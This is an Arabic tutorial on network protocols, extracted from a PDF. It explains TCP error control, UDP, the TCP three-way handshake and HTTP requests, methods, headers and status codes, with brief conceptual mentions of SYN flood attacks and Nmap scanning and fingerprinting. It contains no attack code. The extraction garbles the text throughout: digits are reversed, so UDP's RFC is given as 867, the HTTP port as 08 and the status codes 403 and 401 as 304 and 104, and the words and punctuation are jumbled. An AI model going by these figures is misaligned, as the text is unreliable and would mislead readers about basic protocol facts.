للرزم )‪                                                                ‬‬ ‫علي صعید التحقق من البیانات ‪ TCP ،error control‬يقوم بنوعین من الخدمة ‪:‬‬


‫‪ - 1‬ارسال الرزم المفقودة في الطريق ‪ ،‬واذا الرزمة فقدت ولم يستلم المرسل‪ ‬‬ ‫جواب ‪ ACK‬من المستقبل خلل مدة معینة ‪ Time out‬يقوم بارسال الرزمة مرة‪ ‬‬ ‫اخري ‪                                                                      ..‬‬ ‫‪ - 2‬ارسال الرزم التي وصلت تالفة ( تستخدم حقل ‪ (chsecksum‬و ‪      ..CRC‬‬ ‫المرسل عندما يرسل رزمة ما تنتظر وصول جواب‪ ACK‬من المستقبل لمدة‪     ‬‬ ‫معینة‪ ،‬وفي حالة اكتشاف المستقبل خطأ ما في الرزمة يقوم بارسال رزمة‪    ‬‬ ‫‪ NOT ACK‬او ل يرسل حتي يحدث ‪ Time out‬فالمرسل يعید ارسال الرزمة الخ‪ ‬‬ ‫‪                                                                            ..‬‬ ‫•‪     ‬بروتوكول ‪                                      User Datagram Protocol‬‬ ‫‪ UPD‬ذكرت بالتفصیل في ‪867 RFC‬تقدم اتصال عديم التصال( أي ارسال‪        ‬‬ ‫البیانات ل تتطلب عملیة انشاء التصال مثل ‪ ،( TCP‬تستخدم من قبل تطبیقات‪ ‬‬ ‫تكتفي بارسال رزمة او رزمتین في خدماتھ ا او تستخدم من قبل خدمات التي ل‬ ‫تتأثر بضیاع قلیل من البیانات وتقوم بارسال كمیة كبیرة جدا من البیانات ( مثل‪ ‬‬ ‫تطبیقات فیديو ‪ ،‬صوت ) و‪ UDP‬فقط تقوم باضافة رقم المنفذ وعنوان ‪ IP‬الي‪    ‬‬ ‫المقطع ‪ .‬من التطبیقات التي تستخدم ھذا البروتوكول ‪ NFS‬و ‪ SNMP‬الخ بما ان‬ ‫‪ UDP‬عديمة التصال فھ ي تعد غیر موثوق ول تضمن وصول البیانات الي وجھتھا‬ ‫ول تقدم طريقة للتحقق من ترتیب اجزاء البیانات ‪                             ..‬‬ ‫من أسباب إنشاء وتطوير ھ ذا البروتوكول أن إرسال البیانات عبره ل يتطلب ال‪   ‬‬ ‫القلیل جدا من الوقت‪ ،‬اذ أن رزم ‪ UDP‬ل تحتوي علي إشارات تزامن او خیارات‪  ‬‬ ‫الفضلیة كما ل يراقب ھ ذا البروتوكول تسلسل أرقام الرزم ‪ ...‬لذلك يعتبر سريع‪ ‬‬ ‫‪                                        37‬‬ ‫الداء ذو فعالیة كبیرة خاصة من الجل التصالت المخصصة للبث او الرسائل‪   ‬‬ ‫العامة للشبكة ( البث الشامل) ‪                                         ...‬‬ ‫‪                    Source Port                        |      Destination‬‬ ‫‪                                                     Port‬‬ ‫‪             Length                                |      Checksum‬‬ ‫‪    .................... Data‬‬ ‫حقل ‪ Length‬تشیر الي حجم مطقع ‪                                .. UDP‬‬ ‫== والن نتعرف علبي المصافحة الثلثیة في إنشاء التصال ‪                 :‬‬ ‫الزبون ‪ ----- :1‬رزمة تحمل رقم تسلسي وراية ‪ <­­­­­­­­­­ SYN‬المزود‪   ‬‬ ‫الزبون <‪ ACK/SYN ------‬حسن الیك رقمي التسلسي لرزمتي ‪ 2:---‬المزود‬ ‫الزبون ‪ -----:3‬لقد تلقیت رقمك يا مزود والیك رزمتي ‪ <­­­­­ACK‬المزود‪   ‬‬ ‫في بداية انشاء التصال الزبون يختار منفذ عشوائي متوفر‪ ،‬رقم تسلسي‪    ‬‬ ‫‪                                    47‬‬ ‫بدائي ‪ SIN‬للرزمة التي ترسل طلبا لنشاء التصال‪ ،‬وترسل ذلك الرقم برزمة‪   ‬‬ ‫تححد فیھا راية ‪ SYN‬ولذك تعرف ھذه الرزمة برزمة ‪              . SYN packet‬‬ ‫من جھة اخري المزود عندما يستلم ھذه رزمة ‪ SYN‬يعرف ان ھناك طلبا لنشاء‬ ‫اتصال جديد‪ ،‬ويقوم بحجز جزء من ذاكرتھا لتلك التصال ( ھجمات ‪   SYN flood‬‬ ‫??) ‪ ،‬ويخزن فیھا ‪ SIN‬للزبون وعنوان اليبي ورقم المنفذ في جھة الزبون‪       ‬‬ ‫(وعندما تصل زرم جديدة بعدھ ا يتم البحث في ذاكرة عن رقم اليبي والمنفذ‪   ‬‬ ‫للتعرف علي جزء الخاص من الذاكرة لتلك التصال )‪                            .‬‬ ‫الخطوة القادمة في عملیة المصافحة‪ ،‬المزود تقوم بختیار رقم تسلسي الخاص‬ ‫له للرزمة التي ترسل جوابا للزبون‪ ،‬ويقوم بتحديد راية ‪ ACK‬وراية ‪ SYN‬ولذك‪    ‬‬ ‫تسمي رزمة ‪                                                      .SYN/ACK‬‬ ‫ويستلم الزبون رزمة ‪ SYN/ACK‬من المزود وبذلك تتأكد من ان المزود موجود (‪  ‬‬ ‫عملیات ‪ ( .. ? stealth scan‬وبنفس الوقت تتأكد من رقم ‪ SIN‬التي أرسلھا الي‬ ‫المزود ويقوم ايضا بحفظ رقم ‪ SIN‬التي ارسلھا المزود ‪                        ..‬‬ ‫الخطوة الخیرة في المصافحة علي الزبون ات تقوم بارسال رزمة ‪ ACK‬تحمل‪   ‬‬ ‫رقم ‪ SIN‬الي المزود ‪ ...‬وبھ ذا يتاكد المزود من أن الزبون تسلم رزمته ‪SYN/ACK‬‬ ‫‪                                                                          ..‬‬


‫والن بعدما استعرضنا ترويسة مقطع ‪ TCP‬وعملیة المصافحة‪ ،‬بقي أن نقول‪    ‬‬ ‫ھناك ھ جمات حجب الخدمة ضد المواقع تستغل ھذه المعلومات(‪              ‬‬ ‫‪(DoS,DDoS,DRDoS‬للمزيد راجع موقع ستیف جبسون ‪/http://www.grc.com‬‬ ‫‪ ،‬وھ ناك عملیات الكشف عن النظمة التي تعمل علیھا جھاز بعید‪ ،‬وھناك‪      ‬‬ ‫عملیات الفحص عن المنافذ‪ ،‬كلھا تستخدم ھذه المعلومات ‪                ....‬‬ ‫في عملیات الھجوم ‪ :‬مثل ھجمات ‪ SYN Flood‬الشھیرة‪ ،‬اول جیل ھجمات‪    ‬‬ ‫حجب الخدمة الموزعة ‪ DoS‬التي استغلت عملیة المصافحة الثلث في‪        ‬‬ ‫الھ جوم‪ ،‬بحیث بعد الخطوة الثانیة يقطع العملیة وينشيء اتصال آخر ويكرر‪      ‬‬ ‫وھكذا يستھ لك الموارد المخصصة او يستھلك جھد ‪ CPU‬لدي المزود ويضعه في‬ ‫وضع خارج عن الخدمة( معظم انظمة التشغیل أصلحت ھذه المشكلة بتعديل‪  ‬‬ ‫في المكدس ) حديثا ھذا النوع من الھ جوم مع وضع عنوان ايبي مزيف للرزم‪   ‬‬ ‫مما يصعب عملیة التعقب‪ ..‬للمزيد راجع مجلة‪                                   ‬‬ ‫‪                                       57‬‬ ‫‪ /http://www.phrack.org‬وموقع ‪ ، /http://www.grc.com‬وھذان مقالن‪     ‬‬ ‫بالعربیة ‪ http://www.arabteam2000.com/forum/Details.asp?Id =731‬و‪   ‬‬ ‫‪       82881=http://www.kwakeb.net/cgi­bin/eBoards/showpost.pl?pid‬‬ ‫في عملیات الكشف عن النظمة ‪ OSFingerPrint‬ھناك برامج فحص شھیرة‪   ‬‬ ‫مثل ‪ Nmap‬تعتمد في الكشف علي انشاء رزم بحقول ورايات معینة وثم تحلل‪ ‬‬ ‫الرزمة المستقبلة وبعد تحلیلھ ا تستطیع الكشف عن النظام في الطرف الخر‪  ‬‬ ‫طبقا لبعض الحقول والرايات في الرزمة المرسلة جوابا ‪                       ..‬‬ ‫في عملیات الفحص أيضا ‪ Nmap‬وغیرھ ا تعمد إلي إرسال رزم بحقل‪/‬راية معینة‬ ‫ثم تحلل الرزمة المرسلة جوابا وتكتشف ماذا كان منفذ ما مفتوحا‪ ،‬واما اذا كان‬ ‫الموقع الھ دف حیا الخ من تلك النواع ‪                   ... Stealth/null scan‬‬ ‫للتفصیل في ھ اتین العملیتین يمكنك مراجعة ما كتبه صاحب ‪           Nmap‬‬ ‫‪       http://www.insecure.com/nmap/nmap­fingerprinting­article.html‬‬ ‫وإلي اللقاء في الجزء القادم ‪ ...‬أي استفسار او استزادة او مناقشة يمكنك‪    ‬‬ ‫زيارتنا في ‪ /http://www.arabteam2000.com‬قسم أمن نظم المعلومات‪     ‬‬ ‫‪                                      67‬‬ ‫ماھو‪                                  HTTP‬‬ ‫للكاتب‪                                                         SaD.jAcKAl:‬‬ ‫‪ : HTTP‬البروتوكول الساسي لشبكة ويب العالمیة ‪                           ..‬‬ ‫تعتمد شبكة إنترنت في عملھ ا علي مجموعة من بروتوكولت قیاسیة‪           ‬‬ ‫تستخدمھ ا الحواسیب لتبادل البیانات ‪ .‬ولم يكن ممكنا لشبكة إنترنت أو لي‪    ‬‬ ‫شبكة أخري ان تنشأ من دون ھذه البروتوكولت‪ ،‬وعلي الرغم من أن بروتوكول‪ ‬‬ ‫‪  TCP/IP‬يعتبر البروتوكول الساسي لشبكة إنترنت إل أن عملیات التحكم بكل‪   ‬‬ ‫وظیفة من الوظائف تتم عادة عن طريق بروتوكولت تتوضع فوق بروتوكول‪         ‬‬ ‫‪ ،TCP/IP‬وعندما تكون المور سائرة علي ما يرام‪ ،‬فاننا ل نشعر عادة بھذه‪       ‬‬ ‫البروتوكولت‪ ،‬إل انھا تظھ ر امامنا باستمرار‪ ،‬عند تركیب أدوات ‪ Tools‬جديدة‪ ،‬أو‪  ‬‬ ‫تنفیذ وظائف معینة‪ ،‬ويعتمد البريد اللكتروني علي البروتوكولت البسیط لنقل‪   ‬‬ ‫البريد ‪ ،SMTP‬وعلي بروتوكول مركز البريد ‪ POP‬وتعمل قارئات الخبار ‪      News‬‬ ‫‪  Readers‬عن طريق بروتوكول نقل الخبار عبر الشبكة ‪ ،NNTP‬ويعتمد جلب‪      ‬‬ ‫الملفات عادة علي بروتوكول نقل الملفات ‪ ،FTP‬ويكمن جزء من سحر شبكة‪    ‬‬ ‫الويب العالمیة ‪ Wide We WWW (World‬في انھ ا بیئة متعددة البروتوكولت‪      ‬‬ ‫وھ ذا ما يمكننا من الوصول الي لوائح خدمة ‪ Ghoper‬ومواقع ‪ FTP‬وخدمات‪       ‬‬ ‫انترنت الخري‪ ،‬من خلل متصفحات شبكة ويب ‪               ... Web Browser‬‬ ‫وعلي الرغم من أن شبكة الويب تسمح بالعديد من البروتوكولت‪ ،‬ال انھا‪        ‬‬ ‫تحتوي علي بروتوكول اساسي يسمي "بروتوكول نقل النص المتشعب" ‪HTTP‬‬ ‫‪ . (Protocol (HyperText Transfer‬ويتحكم بروتوكول ‪ HTTP‬بعملیات استردات‪  ‬‬ ‫الوثائق علي شبكة الويب ‪ Web‬التي تقوم بھا برامج المتصحفات ‪ ،Browser‬كما‬ ‫يتحكم بالتفاعلت التي تتم عبر شبكة ويب‪ ،‬من خلل مزايا معینة‪ ،‬مثل‪         ‬‬


‫الستمارات ‪ ،Forms‬ولقد تم اعتماد الصدارة رقم ‪ 1.1‬المعتمد كمواصفات‪       ‬‬ ‫قیاسیة من قبل فريق عمل ھندسة النترنت ‪     IETF(nternet Engeneering‬‬ ‫‪ (Force Task‬بعد أن تبنتھا معظم المتصحفات الحديثة ‪                         .‬‬ ‫ينطلق بروتوكول ‪ HTTP‬في عمله كلما نقرنا علي وصلة تشعبیة ‪     Hyperlink‬‬ ‫‪                                        77‬‬ ‫يبدا "محدد مكان مورد المعلومات الموحد" ‪ (URL)Uniform Resource Locator‬‬ ‫فیھا بالرموز ‪ ،//:Http‬او كلما كتبنا ‪ URL‬يبدا بھذه الرموز ‪ .‬وتوفر معظم‪            ‬‬ ‫المتصحفات الحديثة مثل ‪ Navigator Netscape‬و ‪Microsoft Internet Explorer‬‬ ‫علیك عناء كتابة ھذه الروموز عن طريق اضافتھا آلیا الي عناوي ‪ URL‬التي‪      ‬‬ ‫تطلبھ ا ( باستثناء تلك التي تبدا عنواوينھا بالرموز ‪ FTP‬او ‪ . ( Ghoper‬ويبدا‪      ‬‬ ‫بروتوكول ‪ HTTP‬فور تشغیله بتنفیذ سسلة من العملیات‪ ،‬رباعیة الجزاء‪        ،‬‬ ‫ومؤلفة من المراحل التالیة ‪ :‬مرحلة الربط (‪ ،(Connection‬مرحلة الطلب‪         ‬‬ ‫( ‪ ،(request‬ومرحلة الستجابة ( ‪ ،(Response‬ومرحلة الفصل (‪،(Disconnection‬‬ ‫أو الغلق (‪ .(Cloes‬وقد توسعت مزايا بروتوكول ‪ HTTP‬منذ ظھورھا الول عام‪   ‬‬ ‫‪ 1991‬ال ان ھذه المراحل الربع ل تزال تشكل جوھر عملھا‪ .‬وتمكن معظم‪      ‬‬ ‫المتصحفات الحديثة من متابعة ھذه المراحل اثناء تنفیذھا عنن طريق مراقبة‪   ‬‬ ‫شريط الحالة ( ‪                                                     . (Status Bar‬‬ ‫ونظرا لن بروتوكول ‪ HTTP‬يعتبر من البروتوكولت التي تعتمد علي مبدا الطلب‪  ‬‬ ‫والستجابة فھو يتطلب وجود مزود ‪ server‬وزبون ‪ ، Client‬لنھاء عملیة التبادل ‪.‬‬ ‫وساھمت شبكة الويب في انتشار مفھ وم المزود بحیث نشات إلفة بین معظم‪ ‬‬ ‫مستخدمي انترنت وبرمجیات مزود الويب ‪ .‬ويمكن تعريف المزودات علي انھا‪    ‬‬ ‫حواسیب تحتغظ بالمعلومات لتزود بھا الزبون ‪ clinet‬الذي يطلبھا ‪ .‬ويعتبر‪         ‬‬ ‫مصطلح الزبون ‪ Clinet‬اقل انتشارا علي شبكة الويب لن مفھوم المتصفح‪       ‬‬ ‫‪  Browser‬قد حل محله ‪ .‬وتعتبر متصفحات الويب زبائن بروتوكول ‪ ،HTTP‬تتالف‪   ‬‬ ‫من البرمجیات التي ترسل الطلبات وتستقبل الستجابات‪ ،‬ويمكن ان ننظر الي‪ ‬‬ ‫تبادلت بروتوكول ‪ HTTP‬علي انھا رسالة آسكي ‪ ASCII‬مرسلة من قبل الزبون‪ ‬‬ ‫واستجابة لتلك الرسالة من قبل المزود‪ ،‬ويمكن الفارق بین رسالة الطلب‪       ‬‬ ‫والستجابة في مضمون الرسالة بحد ذاته ‪                                   ....‬‬ ‫مرحلة الرط ومرحلة الفصل ‪                                                      :‬‬ ‫سوف نعرض الي مرحلتین ‪ :‬الولي والخیرة‪ ،‬من تبادلت ‪ HTTP‬بشكل سريع‪  ‬‬ ‫نظرا لنھ ا اقل المراحل الربع تشويقا‪ ،‬ففي مرحلة الربط ‪ Connection‬يسعي‪   ‬‬ ‫الزبون ( المتصفح) الي اقامة علقة ربط مع المزود ( الحاسوب البعید )‪ ،‬وينظر‪  ‬‬ ‫الزبون الي اسم النطاق ( ‪ ( Domain Name‬او الي رقم بروتوكول انترنت ( ‪   IP‬‬ ‫‪  ( Number‬الموجود ضمن مستطیل "محدد مكان مورد المعلومات الموحد" ‪URL‬‬ ‫سعیا للتصال مع المزود‪ ،‬ويحاول بروتوكول ‪ HTTP‬ان يستخدم البوابة ‪ Port‬رقم‪ ‬‬ ‫‪ 08‬علي المزود‪ ،‬لتمام عملیة مرحلة الربط ( ما عدا في الحالت التي يشیر‪    ‬‬ ‫فیھا ‪ URL‬الي بوابة اخري ) ‪ .‬اما عن مرحلة الفصل او الغلق فتتم في نھاية‪  ‬‬ ‫‪                                         87‬‬ ‫تبادلت ‪ ، HTTP‬وتبدا ھ ذه العملیة بايعاز من الزبون‪ ،‬فور النتھاء من نقل الملف‬ ‫المعني‪ ،‬أو بايعاز من الزبون اذا نفذ المزود المستخد امر الوقوف ‪ ،Stop‬أو اذا‪    ‬‬ ‫نفذ تبادل جديدا من نوع ‪ HTTP‬عن طريق الضغط علي نص تشعبي جديد‪ ،‬او‪   ‬‬ ‫اذا استخدم احد ازرار التراجع ‪ Back‬أو التقدم ‪ Forward‬في المتفصح‪ ،‬او اذا‪      ‬‬ ‫انتقي موضوعا جديدا من قائمة المواقع السابقة‪ ،‬في ھذا المتصفح ‪ .‬ويتطلب‪  ‬‬ ‫كل واحد من الموضوعات التي تظھر علي صفحة الويب عملیة ربط مستقلة‪     ‬‬ ‫لتبدا بنقل المعلومات‪ .‬ال ان الصدارة ‪1.1 HTTP‬تتضمن نوعا من الربط المتواصل‬ ‫‪ Persistent connection‬يسمي "البقاء حیا" ‪ Keep Alive‬يمكنه جلب ملفات‪    ‬‬ ‫متعددة ( مثل ملفات الرسومات) من خلل عملیة ربط واحدة فقط ‪                .‬‬ ‫مرحلة الطلب ‪                                                               :‬‬ ‫تبدا مرحلة الطلب فور انتھ اء مرحلة الربط‪ ،‬ويقوم الزبون في ھذه المرحلة‪         ‬‬ ‫بتقديم طلبه ‪ request‬الي المزود عن طريق ارسال رسالة اسكي باسطر‪        ‬‬


‫وحقول معینة وتحتوي الرسالة في أعلھا ‪ ،‬علي سطر الطلب ‪   request line‬‬ ‫متبوعا بثلثة سطور للترويسات ‪ :‬الترويسة العامة ‪ Genereal Header‬وترويسة‬ ‫الطلب ‪ Request Header‬وترويسة الكائن ‪ ،Header Entity‬ويقصد بالكائن‪        ‬‬ ‫المعلومات او الملفات التي ترغب في ارسالھا من متصفحك الي الحاسوب‪      ‬‬ ‫المزود‪ ،‬ويجد علي السطر التالي الترويسة الخیرة حقل يسمي جسم الكائن‪ ‬‬ ‫او ‪ ، Entity Body‬وسنلقي فیما يلي نظرة علي كل سطر وحقل ‪             .....‬‬ ‫يضم سطر الطلب ‪ Request Line‬في رسالة بروتوكول ‪ HTTP‬عددا من‪            ‬‬ ‫التفصیلت‪ ،‬بما فیھا الطريقة المتعبة ‪ ،Method‬ومعرف مكان مورد المعلومات‪    ‬‬ ‫الموحد ‪ ( Identifier URI (Uniform Resource‬واصدارة البروتوكول‪ .‬ونلقي قبل‪ ‬‬ ‫الحديث عن الطريقة المتعبة‪ ،‬نظرة سريعة علي التفصیلت الخري ‪ .‬يتالف‪      ‬‬ ‫معرف مكان مورد المعلومات الموحد ‪ URI‬عادة اما من "محدد مكان مورد‪          ‬‬ ‫المعلومات الموحد" ‪ URL‬او من " اسم مكان مورد المعلومات الوحد" ‪        URN‬‬ ‫( ‪ ،( Uniform Resource Name‬وتكمن مھمته في الشارة الي ملف او مورد‪    ‬‬ ‫اخري‪ ،‬من موارد الشبكة‪ ،‬اما اصدارة البروتوكول فھي كما يتضح من اسمھا‪    ،‬‬ ‫تحدد بروتوكول ‪ HTTP‬المطلوب ‪ .‬ويحتوي الطلب بعد ھذه المواصفات علي نوع‪ ‬‬ ‫من الرسائل‪ ،‬يتضمن مختلف المعدلت ‪ Modifiesrs‬والتفصیلت الخري ووفیما‪  ‬‬ ‫يلي توضیح بسیط ‪                                                           :‬‬ ‫‪ REQUEST SYNTAX‬الصیغة‪                                                  ‬‬ ‫‪                                      ><crlf> "HTTP/1.1"<URL><METHOD‬‬ ‫‪                                       97‬‬ ‫‪                                            }>*{<crlf><Value>:<Header‬‬ ‫‪                                                                    ><crlf‬‬ ‫‪ EXMAPLE‬المثال‪                                                          ‬‬ ‫‪                                                1.1/GET /index.htm HTTP‬‬ ‫‪                                                        Accept: text/plain‬‬ ‫‪                                                        Accept: text/plain‬‬ ‫‪                                                              */* :Accept‬‬ ‫‪                                                    User­Agent: Browser‬‬ ‫يتضمن سطر الطلب في بروتوكول ‪ HTTP‬تحديد الطريقة المتبعة‪ ،‬اكثر الطرق‪   ‬‬ ‫انتشارا ھي طريقة ‪ Get‬و طريقة ‪ Head‬وطريقة ‪ .Post‬وفیما تتضمن الطرق‪     ‬‬ ‫الخري طريقة ‪ Put‬وطريقة ‪ ،Delete‬وتتالف طريقة ‪ Get‬الكثر انتشارا علي‪     ‬‬ ‫الطلق من تعلیمة تطلب من المزود ارسال وثیقة او كائن الي الزبون ‪ .‬وحیث‪  ‬‬ ‫استخدام طلب ‪ Get‬فان متصحف الويب يقول "ارسل لي الملف الموجود عند‪   ‬‬ ‫عنوان ‪ URL‬المعن‪ ،‬بحیث استطیع عرض محتوياته علي المستخدم"‪ ،‬ويمكن‪   ‬‬ ‫تعديل طريقة ‪ Get‬باستخدام عبارات شرطیة لطلب الملفات التي لھا تاريخ‪     ‬‬ ‫معین‪ ،‬او عدلت بتاريخ معین‪ ،‬او تقع ضمن فئة ما‪ ،‬اما المحتويات نفسھا فھي‪  ‬‬ ‫محددة في حقل ‪ Body Entity‬من الطلب‪ ،‬ويتمثل اختلف طريقة ‪ Get‬عن‪      ‬‬ ‫طريقة ‪ Head‬فیما يلي‪ :‬يرسل المزود في طريقة ‪ Head‬كل شيء الي الزبون‪  ‬‬ ‫باستثناء حقل ‪ ، Entity Body‬او بشكل ابسط فھو يرسل معلومات عن الملف‪  ‬‬ ‫ولیس الملف ذاته‪ ،‬ويمكن استخدام طريقة ‪ Head‬لتحديد فیما اذا كان الربط‪    ‬‬ ‫المتشعب شرعیا ام ل‪ ،‬ونشیر ھ نا الي ان برنامج تتبع تحديث العلمات‪         ‬‬ ‫المرجعیة ‪ ،Bookmarks‬تعتبر مثال علي البرامج التي تستخدم طلبات ‪   Head‬‬ ‫‪                                                                       ....‬‬ ‫يزداد استخدام طريقة ‪ Post‬باطراد علي شبكة الويب‪ ،‬واذا سبق لك ان أنشات‪ ‬‬ ‫استمارات ‪ ،HTML Forms‬فانك تعرف حكما طريقة ‪ ،Post‬لن ھذه الطريقة تحدد‬ ‫ماذا يحدث للمعلومات المسلمة عبر الستمارات‪ .‬وتطلب طريقة ‪ Post‬بشكل‪   ‬‬ ‫اساسي من المزود ان يقبل المعلومات المرفقة‪ ،‬كمعلومات مضافة معرفة ‪ URI‬‬ ‫معین‪ ،‬وتستخدم طريقة ‪ ،Post‬علي سبیل المثال‪ ،‬لوضع رسالة او تعلیق ضمن‬ ‫مساحات علي المزود تخصصھا بعض مواقع الويب لھذا الغرض‪ ،‬ولضافة‪         ‬‬ ‫معلومات لقواعد البیانات‪ ،‬ولرسال البیانات من استمارة ويب الي المزود‪ .‬اما ما‬


‫يحدث لتلك البیانات فیعتمد علي المزود ذاته‪ ،‬حیث يمكن ان ترسل الي قاعدة‪ ‬‬ ‫‪                                     08‬‬ ‫بیانات من خلل نص ‪ ،CGI Commom Getway Interface‬أو يمكن ان تضاف‪     ‬‬ ‫علي ھ یئة محددة بشكل مسبق الي وثیقة ‪ ،HTML‬لیتمكن الخرون من‪        ‬‬ ‫مشاھدتھا‪ ،‬ال ان ھ ذا المر ل يدخل في نطاق تبادلت بروتوكول ‪         .HTTP‬‬ ‫تعتبر طريقة ‪ Put‬مشابھة لطريقة ‪ ،Post‬فھ ي تطلب من المزود تخزين‪           ‬‬ ‫المعلومات المرفقة كملف ( كمورد) مسمي من قبل معرف ‪ URI‬في الطلب‪    ،‬‬ ‫واذا كان ھ ذا الملف غیر منشا‪ ،‬ينشئ المزود ملفا جديدا‪ ،‬اما اذا كان الملف‪     ‬‬ ‫منشأ‪ ،‬فیكتب علیه من جديد ‪ .‬ويكمن الفارق الرئیسي بین طريقة ‪        Post‬‬ ‫وطريقة ‪ Put‬في أن معرف ‪ URI‬في طريقة ‪ Post‬يقوم بتسمیة المورد الذي‪      ‬‬ ‫سوف يھتم بالبیانات الموجودة في رسالة ‪ .HTTP‬اما ما يحدث لھا بعد ذلك‪      ‬‬ ‫فیحدده المزود‪ ،‬وقد يؤدي ھ ذا المر‪ ،‬في الواقع الي تعديل مورد مختلف كلیا‪   ،‬‬ ‫عن المورد الذي يحدده معرف ‪ ، URI‬اما في طريقة ‪ Put‬فإن معرف ‪ URI‬علي‪  ‬‬ ‫عكس ما ذكرنا‪ ،‬يشیر الي المعلومات المرفقة‪ ،‬ولیس علي مورد علي المزود‪ ،‬‬ ‫ول يمكن للمزود ان يفعل شیئا بالمعلومات سوي تخزينھا ‪                     ..‬‬ ‫تعتبر طريقة ‪ Put‬اسھل ھ اتین الطريقتین‪ ،‬إل انھا اقل استخداما ايضا‪ ،‬والسبب‪ ‬‬ ‫ھ و ان المشرفین علي المزودات يرغبون لسباب مفھومة في التحكم بوجھة‪   ‬‬ ‫المعلومات‪ .‬تستخدم طريقة ‪ Delete‬للسبب ذاته‪ ،‬بشكل قلیل نسبیا باستثناء‪ ‬‬ ‫استخدامات المشرفین علي المزودات‪ .‬وتطلب طريقة ‪ Delete‬من المزود ان‪     ‬‬ ‫يتخلص من المورد المحدد في سطر معرف ‪ ،URI‬لكن من غیر المفضل ان‪       ‬‬ ‫تسمح بانجاز ھ ذا العمل الخطر عم طريق بضع نقرات علي الوصلت المتشعبة‪،‬‬ ‫ولھ ذا السبب يتم اعداد المزودات بحیث تسمح باستخدام طرق معینة فقط ‪   .‬‬ ‫قد تحتوي اسطر ترويسة الطلب ‪ Request Line‬من رسالة بروتوكول ‪     HTTP‬‬ ‫علي عدة حقول مختلفة مختلفة‪ .‬وتحدد ترويسة ‪ Accept‬نوع الوسط‪ ،‬مثل‪      ‬‬ ‫ملفات الفیديو والصوت الذي يمكن ان يحتويه الستجابة‪ ،‬علي حین أن حقل‪    ‬‬ ‫‪  Accept­Encoding‬يحدد ان مجموعة الرموز المقبولة أو تقنیات الترمیز المقبولة‪ ‬‬ ‫للستجابة ‪ .‬وتغطي ترويسة التفويض ‪ Autorization header‬التفويضات‪          ‬‬ ‫المسموحة بین المتصفح والمزود ‪ .‬فیما تحتوي ترويسة ‪        Cashe­Control‬‬ ‫‪ header‬علي زمرة معقدة من موجھات ‪ Directives‬الكاش‪                      .‬‬ ‫ويتعامل بروتوكول ‪1.1 HTTP‬بشكل مكثف مع التحكم بالكاش والذي اصبح‪       ‬‬ ‫مجال ھ اما في تصمیم وادارة شبكة الويب‪ ،‬خلل السنة الماضیة ‪ .‬وتوجد‪       ‬‬ ‫ترويسات اخري تسمح لتحديد مواصفات الموقع ونوع المحتويات والتواريخ‪        ‬‬ ‫وتفصیلت تعديل المورد‪ ،‬وتفصیلت عن البروكسي وحتي معلومات حول‪         ‬‬ ‫المتصفح ‪ User­Agent‬الذي يقوم بالطلب ‪ .‬ومن المتوقع ان يزداد دور ھذه‪       ‬‬ ‫‪                                       18‬‬ ‫الترويسات بشكل اكبر مع ازدياد تعقیدات شبكة الويب وزيادة تنوع التبادلت‪    ‬‬ ‫الداخلیة‪ ،‬وتكامل مختلف النواع الجديدة من الوساط والمزايا ‪               ...‬‬ ‫الستجابة ‪                                                                    :‬‬ ‫بعد ان ينتھ ي المتصفح من انشاء الربط مع المزود‪ ،‬وارسال طلبه ينتظر رسالة‪ ‬‬ ‫الستجابة وتتالف رسالة الستجابة كما ھو الحال في رسالة الطلب من عدة‪  ‬‬ ‫سطور من المعلومات ويقع في بدايتھا سطر الوضعیة ‪ ،status line‬متبوعا‪      ‬‬ ‫بمجموعة متنوعة من ترويسات الستجابة ثم بالوثیقة او المورد المطلوب‪       ‬‬ ‫وتستغرق الستجابة في معظم الحیان‪ ،‬زمنا اطول لتنفیذھا بالمقارنة مع زمن‬ ‫الطلب‪ ،‬وذلك بسبب احتوائھا علي الملف او المورد المطلوب‪ ،،‬ويعتبر ھذا المر‬ ‫معكوسا في طلبات ‪ Post‬و ‪ Put‬ولكن معظم رسائل ‪ HTTP‬الن ھي طلبات‪    ‬‬ ‫‪ Get‬بسیطة جدا‪                                                             ...‬‬ ‫يحتوي سطر الوضعیة من الستجابة علي رقم إصدارة ‪ ،HTTP‬وشیفرة الوضعیة‬ ‫وعبارة الستجابة‪ ،‬وتتالف شیفیرات الوضعیة ‪ status codes‬من مؤشرات ثلثیة‪ ‬‬ ‫الرقام تدل علي الطريقة التي تم فیھا معالجة الطلب‪ ،‬لكن عبارة السبب‪      ‬‬ ‫‪ Reason Phrase‬قصیرة‪ ،‬وتحتوي علي شرح للشیفرة ‪ ،Code‬باللغة النجلیزية‪ ‬‬


‫العادية‪ .‬ويوجد خمسة تصنیفات لشیفرات الوضعیة ‪                            ...‬‬ ‫‪1 xx‬وتخصص لتفصايل المعلومات‪                                                ‬‬ ‫‪2 xx‬وتشیر الي نجاح العملیة‪                                                   ‬‬ ‫‪3 xx‬وتعلمنا بانتھاء نقل معرف ال ‪                                            URI‬‬ ‫‪4 xx‬وتیشر الي خطأ من جانب المتصفح‪                                         ‬‬ ‫‪ 5 xx‬وتوضح أن المزود يعاني من مشاكل ‪                                     ...‬‬ ‫ول بد اننا شاھدنا بعضا من ھذه الشیفرات مثل ‪ 304‬التي تعني ممنوع‪        ‬‬ ‫الوصول‪ ،‬و ‪ 104‬التي تعني غیر شرعي ‪ .‬وتشیر الشیفرات الخري الي عدم‪    ‬‬ ‫سماح بطريقة طلب معینة ‪ ،504‬والي عدم توفر الخدمة ‪ ،305‬والي عدم دعم‪  ‬‬ ‫الوسط ‪ 514‬الخ ‪ ..‬وتعتبر شیفرة الوضعیة في الواقع استجابة مباشرة لمعالجة‪ ‬‬ ‫معلومات الطلب‪ ،‬ولكن أكثر شیفرات الوضعیة انتشارا ھي غیر مرئیة‪ ،‬ھي ‪002‬‬ ‫تعني ‪ ، OK‬ال ان المتصفح ل يعرضھا بل يعرض عوضا عنھا الملف المطلوب‪     ‬‬ ‫الذي قام بجلبھ ا ‪ ،‬وفیما يلي شیفرة استجابة بسیطة‪                           ‬‬ ‫اول الصیغة‪                                                                     ‬‬ ‫‪                                                           RESONSE SYNTAX‬‬ ‫‪                              "0.1/<crlf>[<message>]<result­code> "HTTP‬‬ ‫‪                                         28‬‬ ‫‪                                              }>*<crlf><Value>:<Header‬‬ ‫‪                                                                      ><crlf‬‬ ‫‪ EXAMLE‬المثال‪                                                              ‬‬ ‫‪                                                          HTTP/1.1 200 OK‬‬ ‫‪                                                          1.0/Server:MDMA‬‬ ‫‪                                                          0.1:MIME­Version‬‬ ‫‪                                                   Content­type: text/html‬‬ ‫‪                                 9991 33:52:00 7 Last­modified:Thu Jul‬‬ ‫‪                                                      